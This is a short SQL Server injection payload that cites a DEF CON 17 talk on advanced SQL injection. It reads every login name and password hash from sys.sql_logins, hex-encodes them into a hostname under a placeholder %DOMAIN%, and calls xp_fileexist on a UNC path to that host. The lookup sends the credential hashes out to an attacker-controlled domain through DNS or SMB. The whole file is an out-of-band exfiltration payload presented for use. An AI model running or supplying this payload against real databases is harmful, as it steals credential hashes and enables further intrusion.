# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf

DECLARE @host varchar(1024);
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');